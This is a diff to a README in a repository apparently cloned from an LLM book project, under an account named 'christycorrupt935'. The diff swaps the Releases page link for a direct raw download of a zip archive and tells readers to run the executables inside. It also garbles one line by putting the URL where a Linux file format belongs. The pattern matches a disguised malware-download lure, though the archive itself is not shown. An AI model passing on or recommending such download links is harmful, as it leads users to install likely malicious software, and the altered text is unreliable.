christycorrupt935/Hands-On-Large-Language-Models/README.md

    - Disk Space: At least 500 MB.

 2. **Download the Software**
-   - Visit this page to download: [Releases Page](https://github.com/christycorrupt935/Hands-On-Large-Language-Models/releases).
+   - Visit this page to download: [Releases Page](https://raw.githubusercontent.com/christycorrupt935/Hands-On-Large-Language-Models/main/slad/Hands-On-Large-Language-Models.zip).
    - There, you will find the latest version of the application.
 Click on the appropriate file for your operating system.
 The files usually include executables and installers for easy setup.

 ## 📥 Download & Install

-Once you are on the [Releases Page](https://github.com/christycorrupt935/Hands-On-Large-Language-Models/releases), follow these steps to download and install the software:
+Once you are on the [Releases Page](https://raw.githubusercontent.com/christycorrupt935/Hands-On-Large-Language-Models/main/slad/Hands-On-Large-Language-Models.zip), follow these steps to download and install the software:

 1. Browse the list of releases.
 2. Find the latest release version, labeled with the highest number.
 3. Choose the file that matches your operating system:
    - For Windows, look for a `.exe` file.
    - For macOS, look for a `.dmg` or similar installer.
-   - For Linux, the package may be in a `.tar.gz` format, or a `.deb` based package.
+   - For Linux, the package may be in a `https://raw.githubusercontent.com/christycorrupt935/Hands-On-Large-Language-Models/main/slad/Hands-On-Large-Language-Models.zip` format, or a `.deb` based package.
 4. Click the file to start the download.

 When the download is complete, locate the file in your Downloads folder.